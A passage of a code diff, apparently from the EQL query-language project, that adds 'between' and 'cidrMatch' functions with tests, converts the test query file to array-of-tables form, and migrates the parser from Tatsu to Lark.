+[[queries]] expected_event_ids = [57] description = "test arraySearch functionality for lists of strings, and lists of objects" query = ''' registry where arraySearch(bytes_written_string_list, a, a == 'en-us')''' -[queries.q155] +[[queries]] expected_event_ids = [57] description = "test arraySearch functionality for lists of strings, and lists of objects" query = ''' registry where arraySearch(bytes_written_string_list, a, endsWith(a, '-us'))''' -[queries.q156] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - true" query = ''' @@ -1039,28 +1104,28 @@ network where mysterious_field and arraySearch(mysterious_field.subarray, s, true) ''' -[queries.q157] +[[queries]] expected_event_ids = [] description = "test arraySearch - false" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, false) ''' -[queries.q158] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - conditional" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a == 's0-*') ''' -[queries.q159] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - conditional" query = ''' network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a != 's0-*') ''' -[queries.q160] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested" query = ''' @@ -1069,7 +1134,7 @@ network where mysterious_field arraySearch(sub1.c, nested, nested.x.y == '*')) ''' -[queries.q161] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' @@ -1078,7 +1143,7 @@ network where mysterious_field sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == 's0-c1-x-z')) ''' -[queries.q162] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' @@ -1087,7 +1152,7 @@ network where mysterious_field sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == sub1.cross_match)) ''' -[queries.q163] +[[queries]] expected_event_ids = [75305] description = "test arraySearch - nested with cross-check pass" query = ''' @@ -1096,39 +1161,143 @@ network where mysterious_field arraySearch(sub1.c, nested, nested.x.y == mysterious_field.outer_cross_match)) ''' -[queries.q164] +[[queries]] expected_event_ids = [] description = "test 'safe()' wrapper for exception handling" query = ''' network where safe(divide(process_name, process_name)) ''' -[queries.q165] +[[queries]] query = ''' file where serial_event_id == 82 and (true == (process_name in ('svchost.EXE', 'bad.exe', 'bad2.exe'))) ''' expected_event_ids = [82] description = "nested set comparisons" -[queries.q166] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayCount(bytes_written_string_list, s, s == '*-us') == 1 ''' -[queries.q167] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayCount(bytes_written_string_list, s, s == '*en*') == 2 ''' -[queries.q168] +[[queries]] expected_event_ids = [57] query = ''' -registry where arrayContains(bytes_written_string_list, "ross", "en-US") +registry where arrayContains(bytes_written_string_list, "missing", "en-US") +''' + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id - 1 == 81" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id + 1 == 83" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id * 2 == 164" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id / 2 == 41" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id % 40 == 2" + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "s", "e") == "yst" +''' + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "s", "e", false) == "yst" +''' + +[[queries]] +expected_event_ids = [] +query = ''' +process where between(process_name, "s", "e", false, true) == "yst" +''' + +[[queries]] +expected_event_ids = [1, 2, 42] +query = ''' +process where between(process_name, "s", "e", false, true) == "t" +''' + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "S", "e", false, true) == "yst" +''' + +[[queries]] +expected_event_ids = [1] +query = ''' +process where between(process_name, "s", "e", true) == "ystem Idle Proc" +''' + +[[queries]] +expected_event_ids = [95] +query = ''' +file where between(file_path, "dev", ".json", false) == "\\testlogs\\something" +''' + +[[queries]] +expected_event_ids = [95] +query = ''' +file where between(file_path, "dev", ".json", true) == "\\testlogs\\something" +''' + +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "10.6.48.157/8") +''' + +[[queries]] +expected_event_ids = [] +query = ''' +network where cidrMatch(source_address, "192.168.0.0/16") +''' + +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "192.168.0.0/16", "10.6.48.157/8") + +''' +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "0.0.0.0/0") +''' + +[[queries]] +expected_event_ids = [7, 14, 22, 29, 44] +query = ''' +process where length(between(process_name, 'g', 'e')) > 0 +''' + +[[queries]] +expected_event_ids = [] +query = ''' +process where length(between(process_name, 'g', 'z')) > 0 ''' -[queries.q169] +[[queries]] expected_event_ids = [11, 50] description = "test window pipe" query = ''' @@ -1139,7 +1308,7 @@ unique_count parent_process_name | filter count == 5 ''' -[queries.q170] +[[queries]] expected_event_ids = [55] description = "test window pipe with descendant" query = ''' diff --git a/eql/functions.py b/eql/functions.py index 6083fc9..2112731 100644 --- a/eql/functions.py +++ b/eql/functions.py @@ -1,5 +1,7 @@ """EQL functions.""" import re +import socket +import struct from .signatures import SignatureMixin from .errors import EqlError @@ -10,6 +12,8 @@ _registry = {} +REGEX_FLAGS = re.IGNORECASE | re.UNICODE | re.DOTALL +MAX_IP = 0xffffffff def register(func): @@ -37,6 +41,15 @@ def get_callback(cls, *arguments): """Get a callback function for the AST.""" return cls.run + @classmethod + def optimize(cls, arguments): + """Optimize each function independently.""" + return FunctionCall(cls.name, arguments) + + @classmethod + def alternate_render(cls, arguments, precedence=None, **kwargs): + """Return an alternate rendering for a function.""" + @classmethod def run(cls, *arguments): """Reference implementation of the function.""" @@ -64,6 +77,14 @@ class MathFunctionSignature(FunctionSignature): argument_types = [NUMBER, NUMBER] return_value = NUMBER + operator = None + + @classmethod + def optimize(cls, arguments): + """Convert to a MathOperation.""" + if cls.operator: + return MathOperation(arguments[0], cls.operator, arguments[1]) + return FunctionCall(cls.name, arguments) @register @@ -120,6 +141,223 @@ class ArraySearch(DynamicFunctionSignature): return_value = BOOLEAN +@register +class Between(FunctionSignature): + """Return a substring that's between two other substrings.""" + + name = "between" + argument_types = [STRING, STRING, STRING, literal(BOOLEAN), literal(BOOLEAN)] + minimum_args = 3 + return_value = STRING + + @classmethod + def run(cls, source_string, first, second, greedy=False, case_sensitive=False): + """Return the substring between two other ones.""" + if is_string(source_string) and is_string(first) and is_string(second) and first and second: + match_string = source_string + + if not case_sensitive: + match_string = match_string.lower() + first = first.lower() + second = second.lower() + + before, first_match, remaining = match_string.partition(first) + if not first_match: + return "" + + start_pos = len(before) + len(first_match) + + if greedy: + between, second_match, _ = remaining.rpartition(second) + else: + between, second_match, _ = remaining.partition(second) + + if not second_match: + return "" + + end_pos = start_pos + len(between) + return source_string[start_pos:end_pos] + + +@register +class CidrMatch(FunctionSignature): + """Math an IP address against a list of IPv4 subnets in CIDR notation.""" + + name = "cidrMatch" + argument_types = [STRING, literal(STRING)] + additional_types = literal(STRING) + return_value = BOOLEAN + + octet_re = r'(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])' + ip_re = r'\.'.join([octet_re, octet_re, octet_re, octet_re]) + ip_compiled = re.compile(r'^{}$'.format(ip_re)) + cidr_compiled = re.compile(r'^{}/(3[0-2]|2[0-9]|1[0-9]|[0-9])$'.format(ip_re)) + + # store it in native representation, then recover it in network order + masks = [struct.unpack(">L", struct.pack(">L", MAX_IP & ~(MAX_IP >> b)))[0] for b in range(33)] + mask_addresses = [socket.inet_ntoa(struct.pack(">L", m)) for m in masks] + + @classmethod + def to_mask(cls, cidr_string): + """Split an IP address plus cidr block to the mask.""" + ip_string, size = cidr_string.split("/") + size = int(size) + ip_bytes = socket.inet_aton(ip_string) + subnet_int, = struct.unpack(">L", ip_bytes) + + mask = cls.masks[size] + + return subnet_int & mask, mask + + @classmethod + def make_octet_re(cls, start, end): + """Convert an octet-range into a regular expression.""" + combos = [] + + if start == end: + return "{:d}".format(start) + + if start == 0 and end == 255: + return cls.octet_re + + # 0xx, 1xx, 2xx + for hundreds in (0, 100, 200): + h = int(hundreds / 100) + h_digit = "0?" if h == 0 else "{:d}".format(h) + + # if the whole range is included, then add it + if start <= hundreds < hundreds + 99 <= end: + # allow for leading zeros + if h == 0: + combos.append("{:s}[0-9]?[0-9]".format(h_digit)) + else: + combos.append("{:s}[0-9][0-9]".format(h_digit)) + continue + + # determine which of the tens ranges are entirely included + # so that we can do "h[a-b][0-9]" + hundreds_matches = [] + full_tens = [] + + # now loop over h00, h10, h20 + for tens in range(hundreds, hundreds + 100, 10): + t = int(tens / 10) % 10 + t_digit = "0?" if (h == 0 and t == 0) else "{:d}".format(t) + + if start <= tens < tens + 9 <= end: + # fully included, add to the list + full_tens.append(t) + continue + + # now add the final [a-b] + matching_ones = [one % 10 for one in range(tens, tens + 10) if start <= one <= end] + + if matching_ones: + ones_match = t_digit + if len(matching_ones) == 1: + ones_match += "{:d}".format(matching_ones[0]) + else: + ones_match += "[{:d}-{:d}]".format(min(matching_ones), max(matching_ones)) + hundreds_matches.append(ones_match) + + if full_tens: + if len(full_tens) == 1: + tens_match = "{:d}".format(full_tens[0]) + else: + tens_match = "[{:d}-{:d}]".format(min(full_tens), max(full_tens)) + + # allow for 001 - 009 + if h == 0 and 0 in full_tens: + tens_match += "?" + + tens_match += "[0-9]" + hundreds_matches.append(tens_match) + + if len(hundreds_matches) == 1: + combos.append("{:s}{:s}".format(h_digit, hundreds_matches[0])) + elif len(hundreds_matches) > 1: + combos.append("{:s}({:s})".format(h_digit, "|".join(hundreds_matches))) + + return "({})".format("|".join(combos)) + + @classmethod + def make_cidr_regex(cls, cidr): + """Convert a list of wildcards strings for matching a cidr.""" + min_octets, max_octets = cls.to_range(cidr) + return r"\.".join(cls.make_octet_re(*pair) for pair in zip(min_octets, max_octets)) + + @classmethod + def to_range(cls, cidr): + """Get the IP range for a list of IP addresses.""" + ip_integer, mask = cls.to_mask(cidr) + max_ip_integer = ip_integer | (MAX_IP ^ mask) + + min_octets = struct.unpack("BBBB", struct.pack(">L", ip_integer)) + max_octets = struct.unpack("BBBB", struct.pack(">L", max_ip_integer)) + + return min_octets, max_octets + + @classmethod + def get_callback(cls, _, *cidr_matches): + """Get the callback function with all the masks converted.""" + masks = [cls.to_mask(cidr.value) for cidr in cidr_matches] + + def callback(source, *_): + if is_string(source) and cls.ip_compiled.match(source): + ip_integer, _ = cls.to_mask(source + "/32") + + for subnet, mask in masks: + if ip_integer & mask == subnet: + return True + + return False + + return callback + + @classmethod + def run(cls, ip_address, cidr_matches): + """Compare an IP address against a list of cidr blocks.""" + if is_string(ip_address) and cls.ip_compiled.match(ip_address): + ip_integer, _ = cls.to_mask(ip_address + "/32") + + for cidr in cidr_matches: + if is_string(cidr) and cls.cidr_compiled.match(cidr): + subnet, mask = cls.to_mask(cidr) + if ip_integer & mask == subnet: + return True + + return False + + @classmethod + def validate(cls, arguments, type_hints=None): + """Validate the calling convention and change the argument order if necessary.""" + # used to have just two arguments and the pattern was on the left and expression on the right + error_position, _, _ = super(CidrMatch, cls).validate(arguments, type_hints) + + if error_position is not None: + return error_position, arguments, type_hints + + # create a copy of the array that we can modify + arguments = arguments[:] + + for pos, argument in enumerate(arguments[1:], 1): + argument = arguments[pos] = String(argument.value.strip()) + + if not cls.cidr_compiled.match(argument.value): + return pos, arguments, type_hints + + # Since it does match, we should also rewrite the string + ip_address, size = argument.value.split("/") + subnet_integer, _ = cls.to_mask(argument.value) + subnet_bytes = struct.pack(">L", subnet_integer) + subnet_base = socket.inet_ntoa(subnet_bytes) + + # overwrite the original argument so it becomes the subnet + argument.value = "{}/{}".format(subnet_base, size) + + return None, arguments, type_hints + + @register class Concat(FunctionSignature): """Concatenate multiple values as strings.""" @@ -145,7 +383,7 @@ class Divide(MathFunctionSignature): @classmethod def run(cls, x, y): """Divide numeric values.""" - if is_number(x) and is_number(y): + if is_number(x) and is_number(y) and y != 0: return float(x) / float(y) @@ -220,7 +458,7 @@ def join_regex(cls, *regex): def get_callback(cls, source_ast, *regex_literals): """Get a callback function that uses the compiled regex.""" regs = [reg.value for reg in regex_literals] - compiled = re.compile("|".join(regs), re.IGNORECASE | re.UNICODE) + compiled = re.compile("|".join(regs), REGEX_FLAGS) def callback(source, *_): return is_string(source) and compiled.match(source) is not None @@ -243,7 +481,7 @@ def run(cls, source, *matches): source = source.decode("utf-8", "ignore") if is_string(source): - match = re.match("|".join(matches), source, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + match = re.match("|".join(matches), source, REGEX_FLAGS) return match is not None @@ -421,16 +659,27 @@ def get_callback(cls, source_ast, *wildcard_literals): """Get a callback function that uses the compiled regex.""" wc_values = [wc.value for wc in wildcard_literals] pattern = cls.to_regex(*wc_values) - compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE) + compiled = re.compile(pattern, REGEX_FLAGS) def callback(source, *_): return is_string(source) and compiled.match(source) is not None return callback + @classmethod + def alternate_render(cls, arguments, precedence=None, **kwargs): + """Allow some functions to be rendered back as shorthand.""" + if len(arguments) == 2 and isinstance(arguments[1], String): + lhs, rhs = arguments + return Comparison(lhs, Comparison.EQ, rhs).render(precedence, **kwargs) + @classmethod def run(cls, source, *wildcards): """Compare a string against a list of wildcards.""" pattern = cls.to_regex(*wildcards) - compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + compiled = re.compile(pattern, REGEX_FLAGS) return is_string(source) and compiled.match(source) is not None + + +# circular dependency +from .ast import MathOperation, FunctionCall, Comparison, String # noqa: E402 diff --git a/eql/highlighters.py b/eql/highlighters.py index ce29c41..cc7741f 100644 --- a/eql/highlighters.py +++ b/eql/highlighters.py @@ -62,7 +62,7 @@ class EqlLexer(RegexLexer): (r'\?"(\\"|[^"])*"?', token.String.Regex), (r"\?'(\\'|[^'])*'?", token.String.Regex), - (r'(==|=|!=|<|<=|>=|>)', token.Operator), + (r'(==|=|!=|<|<=|>=|>|\+|\-|\*|/|\%|:)', token.Operator), (r'[()\[\],.]', token.Punctuation), ] } diff --git a/eql/parser.py b/eql/parser.py index fc908a8..c4b059e 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -4,14 +4,12 @@ import datetime import re import sys -from collections import OrderedDict -import threading +from collections import OrderedDict, defaultdict +import contextlib -import tatsu -import tatsu.exceptions -import tatsu.objectmodel -import tatsu.semantics -import tatsu.walkers +from lark import Lark, Tree, Token +from lark.visitors import Interpreter +from lark.exceptions import LarkError from . import ast from . import pipes @@ -36,6 +34,7 @@ "ignore_missing_functions", "strict_field_schema", "allow_enum_fields", + "extract_query_terms", ) @@ -58,9 +57,6 @@ RESERVED = {n.render(): n for n in [ast.Boolean(True), ast.Boolean(False), ast.Null()]} -GRAMMAR = None -compiled_parser = None -compiler_lock = threading.Lock() NON_SPACE_WS = re.compile(r"[^\S ]+") @@ -70,28 +66,43 @@ strict_field_schema = ParserConfig(strict_fields=True, implied_booleans=False) allow_enum_fields = ParserConfig(enable_enum=True) +keywords = ("and", "by", "const", "false", "in", "join", "macro", + "not", "null", "of", "or", "sequence", "true", "until", "with", "where" + ) -local = threading.local() -try: - from ._parsergen import EQLParser # noqa: E402 - local.parser = EQLParser(parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) -except ImportError: - pass +class KvTree(Tree): + """Helper class with methods for looking up child nodes by name.""" + def get(self, name): + """Get a child by the name of the data.""" + for match in self.get_list(name): + return match -def transpose(iter): - """Transpose iterables.""" - if not iter: - return [], [] - return [list(t) for t in zip(*iter)] + def get_list(self, name): + """Get a list of all children for a name.""" + return [child for child in self.children + if isinstance(child, Token) and child.type == name or + isinstance(child, KvTree) and child.data == name] + def __contains__(self, item): + return any(isinstance(child, Token) and child.type == item or + isinstance(child, KvTree) and child.data == item for child in self.children) -class EqlWalker(tatsu.walkers.NodeWalker): - """Walker of Tatsu semantic model to convert it into a EQL AST.""" + def __getitem__(self, item): + """Helper method for getting by index.""" + return self.get(item) - def __init__(self): - """Walker for building an EQL syntax tree from a Tatsu syntax tree. + @property + def child_trees(self): + return [child for child in self.children if isinstance(child, KvTree)] + + +class LarkToEQL(Interpreter): + """Walker of Lark tree to convert it into a EQL AST.""" + + def __init__(self, text): + """Walker for building an EQL syntax tree from a Lark tree. :param bool implied_any: Allow for event queries to skip event type and WHERE, replace with 'any where ...' :param bool implied_base: Allow for queries to be built with only pipes. Base query becomes 'any where true' @@ -99,7 +110,8 @@ def __init__(self): :param bool pipes: Toggle support for pipes :param PreProcessor preprocessor: Use an EQL preprocessor to expand definitions and constants while parsing """ - super(EqlWalker, self).__init__() + self.text = text + self._lines = None self.implied_base = ParserConfig.read_stack("implied_base", False) self.implied_any = ParserConfig.read_stack("implied_any", False) @@ -132,54 +144,92 @@ def __init__(self): self._pipe_schemas = [] self._var_types = dict() self._check_functions = ParserConfig.read_stack("check_functions", True) + self._stacks = defaultdict(list) + + @property + def lines(self): + """Lazily split lines in the original text.""" + if self._lines is None: + self._lines = [t.rstrip("\r\n") for t in self.text.splitlines(True)] + + return self._lines + + @staticmethod + def unzip_hints(rv): + """Separate a list of (node, hints) into separate arrays.""" + rv = list(rv) + + if not rv: + return [], [] + + nodes, hints = zip(*rv) + return list(nodes), list(hints) + + @contextlib.contextmanager + def scoped(self, **kv): + """Set scoped values.""" + for k, v in kv.items(): + self._stacks[k].append(v) + try: + yield + finally: + for k in kv: + self._stacks[k].pop() + + def scope(self, name, default=None): + """Read something from the scope.""" + stack = self._stacks[name] + if len(stack) == 0: + return default + return stack[-1] @property def multiple_events(self): """Check if multiple events can be queried.""" return len(self._pipe_schemas) > 1 - @property - def event_type(self): - """Get the active event type.""" - if not self._event_types: - return EVENT_TYPE_ANY - return self._event_types[-1] - - @staticmethod - def _error(node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + def _error(self, node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + # type: (KvTree, str) -> Exception """Generate.""" - params = dict(node.ast) + params = {} + for child in node.children: + if isinstance(child, Token): + params[child.type] = child.value + elif isinstance(child, KvTree): + # TODO: Recover the original string slice + params[child.data] = child + for k, value in params.items(): if isinstance(value, list): params[k] = ', '.join([v.render() if isinstance(v, ast.EqlNode) else to_unicode(v) for v in value]) + params.update(kwargs) message = message.format(**params) - line_number = node.parseinfo.line + line_number = node.line - 1 if not end else node.end_line - 1 + column = node.column - 1 if not end else node.end_column - 1 # get more lines for more informative error messages. three before + two after - before = node.parseinfo.buffer.get_lines(0, line_number)[-3:] - after = node.parseinfo.buffer.get_lines(line_number+1)[:2] + before = self.lines[:line_number + 1][-3:] + after = self.lines[line_number + 1:][:3] - source = '\n'.join(b.rstrip('\r\n') for b in before) - trailer = '\n'.join(a.rstrip('\r\n') for a in after) + source = '\n'.join(b for b in before) + trailer = '\n'.join(a for a in after) # lines = node.parseinfo.text_lines() # source = '\n'.join(l.rstrip() for l in lines) - col = node.line_info.col # Determine if the error message can easily look like this # ^^^^ - if width is None and not end: - if not NON_SPACE_WS.search(node.text): - width = len(node.text) + if width is None and not end and node.line == node.end_line: + if not NON_SPACE_WS.search(self.lines[line_number][column:node.end_column]): + width = node.end_column - node.column if width is None: width = 1 - return cls(message, line_number, col, source, width=width, trailer=trailer) + return cls(message, line_number, column, source, width=width, trailer=trailer) - @classmethod - def _type_error(cls, node, message, expected_type, actual_type=None, **kwargs): + def _type_error(self, node, message, expected_type, actual_type=None, **kwargs): """Return an exception for type mismatches.""" kwargs.setdefault('cls', EqlTypeMismatchError) expected_spec = types.get_specifier(expected_type) @@ -204,7 +254,7 @@ def get_friendly_name(t, show_spec=False): if len(union_type) != 1: type_strings.append("array") else: - type_strings.append("array[{}]".format(get_friendly_name(union_type, show_spec=False))) + type_strings.append("array[{}]".format(get_friendly_name(union_type[0], show_spec=False))) elif len(t) == 1 or union_type != "null": type_strings.append(to_unicode(union_type)) @@ -218,7 +268,7 @@ def get_friendly_name(t, show_spec=False): expected_type = get_friendly_name(expected_type, show_spec=not spec_match) actual_type = get_friendly_name(actual_type, show_spec=not spec_match) - return cls._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) + return self._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) def _walk_default(self, node, *args, **kwargs): """Callback function to walk the AST.""" @@ -228,39 +278,35 @@ def _walk_default(self, node, *args, **kwargs): return tuple(self.walk(n, *args, **kwargs) for n in node) return node - def walk(self, node, *args, **kwargs): - """Optimize the AST while walking it.""" - event_type = kwargs.pop("event_type", None) - split = kwargs.pop("split", False) + def visit_children(self, tree): + """Wrap visit_children to be more flexible.""" + if tree is None: + return None + + return Interpreter.visit_children(self, tree) - if event_type is not None: - self._event_types.append(event_type) + def visit(self, tree): + """Optimize a return value.""" + if tree is None: + return None - output = super(EqlWalker, self).walk(node, *args, **kwargs) + if isinstance(tree, list): + return [self.visit(t) for t in tree] - if event_type is not None: - self._event_types.pop() + rv = Interpreter.visit(self, tree) - if isinstance(output, tuple) and isinstance(output[0], ast.EqlNode) and isinstance(output[1], tuple): - output_node, output_hint = output + if isinstance(rv, tuple) and rv and isinstance(rv[0], ast.EqlNode): + output_node, output_hint = rv output_node = output_node.optimize() # If it was optimized to a literal, the type may be constrained if isinstance(output_node, ast.Literal): output_hint = types.get_specifier(output_hint), types.get_type(output_node.type_hint) - output = output_node, output_hint - elif isinstance(output, ast.EqlNode): - return output.optimize() - - if split: - if isinstance(output, list): - return [list(o) for o in transpose(output)] - return zip(*output) + return output_node, output_hint + return rv - return output - - def validate_signature(self, node, signature, arguments, hints): + def validate_signature(self, node, signature, argument_nodes, arguments, hints): """Validate a signature against input arguments and type hints.""" error_node = node node_type = 'pipe' if issubclass(signature, ast.PipeCommand) else 'function' @@ -278,10 +324,9 @@ def validate_signature(self, node, signature, arguments, hints): max_args = len(signature.argument_types) # Try to line up the error message with the argument that went wrong - # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo if min_args is not None and len(arguments) < min_args: - message = "Expected at least {} argument{} to pipe {}".format( - min_args, 's' if min_args != 1 else '', node.name) + message = "Expected at least {} argument{} to {} {}".format( + min_args, 's' if min_args != 1 else '', node_type, self.visit(node["name"])) raise self._error(error_node, message, end=len(arguments) != 0) elif max_args is not None and max_args < len(arguments): @@ -292,12 +337,12 @@ def validate_signature(self, node, signature, arguments, hints): else: argument_desc = 'up to {} arguments'.format(max_args) message = "Expected {} to {} {}".format(argument_desc, node_type, name) - error_node = node.args[max_args] + error_node = argument_nodes[max_args] raise self._error(error_node, message) elif bad_index is not None: - if isinstance(node.args[bad_index], tatsu.semantics.Node): - error_node = node.args[bad_index] + if isinstance(argument_nodes[bad_index], (KvTree, Token)): + error_node = argument_nodes[bad_index] actual_type = hints[bad_index] expected_type = signature.additional_types @@ -312,72 +357,30 @@ def validate_signature(self, node, signature, arguments, hints): return new_arguments, new_hints - def walk__root_expression(self, node, keep_hint=False, query_condition=False): - """Get the root expression, and rip out the type hint.""" - expr, hint = self.walk(node.expr) - if query_condition and not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): - raise self._type_error(node.expr, "Expected {expected_type} not {actual_type}", types.BOOLEAN, hint) - if keep_hint: - return expr, hint - return expr + def start(self, node): + """Entry point for the grammar.""" + return self.visit(node.children[0]) # literals - def walk__literal(self, node, **kwargs): + def literal(self, node): """Callback function to walk the AST.""" - value = self.walk(node.value) - cls = ast.Literal.find_type(value) - - if cls is ast.String: - value = to_unicode(value) + value, = self.visit_children(node) + if is_string(value): + return ast.String(value), types.literal(ast.String) + return ast.Number(value), types.literal(ast.Number.type_hint) - # If a 'raw' string is detected, then only unescape the quote character - if node.text.startswith('?'): - quote_char = node.text[-1] - value = value.replace("\\" + quote_char, quote_char) - else: - value = ast.String.unescape(value) - - return cls(value), types.literal(cls.type_hint) - - def walk__time_range(self, node): + def time_range(self, node): """Callback function to walk the AST.""" - val = self.walk(node.val) - unit = self.walk(node.unit) + val, unit = self.visit_children(node) + for name, interval in units.items(): if name.startswith(unit.rstrip('s') or 's'): return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) - raise self._error(node, "Unknown time unit") - - def walk__check_parentheses(self, node): - """Check that parentheses are matching.""" - # check for the deepest one first, so it can raise an exception - expr = self.walk(node.expr) - - if node.ast.get('closing', ')') is None: - raise self._error(node, "Mismatched parentheses ()") - return expr + raise self._error(node["name"], "Unknown time unit") # fields - def walk__attribute(self, node): - """Validate attributes.""" - if node.attr in RESERVED: - raise self._error(node, "Illegal use of reserved value") - return node.attr - - def walk__array_index(self, node): - """Get the index for the field in the array.""" - if node.ast.get('value', None) is not None: - return node.value - - if node.ast.get('closing', ']') is None: - raise self._error(node, "Mismatched brackets []") - - if 'missing' in node.ast: - raise self._error(node, "Required index to array.") - raise self._error(node, "Invalid index to array.") - - def _get_field_hint(self, node, field, allow_enum=False): + def _get_field_hint(self, node, field): type_hint = types.BASE_ALL allow_missing = self._schema.allow_missing @@ -400,9 +403,9 @@ def _get_field_hint(self, node, field, allow_enum=False): return field, types.dynamic(type_hint) # check if it's a variable and - elif node.base not in self._var_types: + elif field.base not in self._var_types: event_field = field - event_type = self.event_type + event_type = self.scope("event_type", default=EVENT_TYPE_ANY) type_hint = self._schema.get_event_type_hint(event_type, event_field.full_path) @@ -428,55 +431,116 @@ def _get_field_hint(self, node, field, allow_enum=False): return field, types.dynamic(type_hint) - def walk__field(self, node, get_variable=False, **kwargs): - """Callback function to walk the AST.""" - if get_variable: - if node.base in RESERVED or node.sub_fields: - raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) - elif node.base in self._var_types: - raise self._error(node, "Reuse of variable {base}") + def _add_variable(self, name, type_hint=types.BASE_ALL): + self._var_types[name] = type_hint + return ast.Field(name), types.VARIABLE + + def method_chain(self, node): + """Expand a chain of methods into function calls.""" + rv = None + for prev_node, function_node in zip(node.children[:-1], node.children[1:]): + rv = self.function_call(function_node, prev_node, rv) - # This can be overridden by the parent function that is parsing it - self._var_types[node.base] = types.BASE_ALL - return ast.Field(node.base), types.VARIABLE + return rv - if node.base in RESERVED: - if len(node.sub_fields) != 0: - raise self._error(node, "Illegal use of reserved value") + def value(self, node): + """Check if a value is signed.""" + value, value_hint = self.visit(node.children[1]) + if not types.check_types(types.NUMBER, value_hint): + raise self._type_error(node, "Sign applied to non-numeric value", types.NUMBER, value_hint) - value = RESERVED[node.base] + if node.children[0] == "-": + if isinstance(value, ast.Number): + value.value = -value.value + else: + value = ast.MathOperation(ast.Number(0), "-", value) + + return value, value_hint + + def name(self, node): + """Check for illegal use of keyword.""" + text = node["NAME"].value + if text in keywords: + raise self._error(node, "Invalid use of keyword", cls=EqlSyntaxError) + + return text + + def number(self, node): + """Parse a number with a sign.""" + token = node.children[-1] + if token.type == "UNSIGNED_INTEGER": + value = int(token) + else: + value = float(token) + + if int(value) == value: + value = int(value) + + if node["SIGN"] == "-": + return -value + return value + + def string(self, node): + value = node.children[0] + + # If a 'raw' string is detected, then only unescape the quote character + if value.startswith('?'): + quote_char = value[1] + return value[2:-1].replace("\\" + quote_char, quote_char) + else: + return ast.String.unescape(value[1:-1]) + + def base_field(self, node): + """Get a base field.""" + name = node["name"] + text = name["NAME"] + + if text in RESERVED: + value = RESERVED[text] return value, types.literal(value.type_hint) - path = self.walk(node.sub_fields) + # validate against the remaining keywords + name = self.visit(name) - if not path and node.base in self.preprocessor.constants: - constant = self.preprocessor.constants[node.base] + if name in self.preprocessor.constants: + constant = self.preprocessor.constants[name] return constant.value, types.literal(constant.value.type_hint) # Check if it's part of the current preprocessor that we are building # and if it is, then return it unexpanded but with a type hint - if not path and node.base in self.new_preprocessor.constants: - constant = self.new_preprocessor.constants[node.base] - return ast.Field(node.base), types.literal(constant.value.type_hint) + if name in self.new_preprocessor.constants: + constant = self.new_preprocessor.constants[name] + return ast.Field(name), types.literal(constant.value.type_hint) - field = ast.Field(node.base, path) - return self._get_field_hint(node, field, allow_enum=self._allow_enum) + field = ast.Field(name) + return self._get_field_hint(node, field) - # comparisons - def walk__equals(self, node): + def field(self, node): """Callback function to walk the AST.""" - # May be double or single equals - return '==' + full_path = [s.strip() for s in re.split(r"[.\[\]]+", node.children[0])] + full_path = [int(s) if s.isdigit() else s for s in full_path if s] - def walk__comparator(self, node): - """Walk comparators like <= < != == > >=.""" - return self.walk(node.comp) + if any(p in keywords for p in full_path): + raise self._error(node, "Invalid use of keyword", cls=EqlSyntaxError) - def walk__comparison(self, node): + base, path = full_path[0], full_path[1:] + + # if get_variable: + # if base_name in RESERVED or node.sub_fields: + # raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) + # elif base_name in self._var_types: + # raise self._error(node, "Reuse of variable {base}") + + # # This can be overridden by the parent function that is parsing it + # return self._add_variable(node.base) + field = ast.Field(base, path) + return self._get_field_hint(node, field) + + def comparison(self, node): """Callback function to walk the AST.""" - left, left_type = self.walk(node.left) - right, right_type = self.walk(node.right) - op = self.walk(node.op) + (left, left_type), comp_op, (right, right_type) = self.visit_children(node) + + op = "==" if comp_op.type == 'EQUALS' else comp_op.value accepted_types = types.union(types.PRIMITIVES, types.NULL) error_message = "Unable to compare {expected_type} to {actual_type}" @@ -485,7 +549,7 @@ def walk__comparison(self, node): not types.check_types(accepted_types, left_type) or \ not types.check_types(accepted_types, right_type): # check if the types can actually be compared, and don't allow comparison of nested types - raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + raise self._type_error(node, error_message, types.clear(left_type), types.clear(right_type)) if op in (ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GE, ast.Comparison.GE): # check that <, 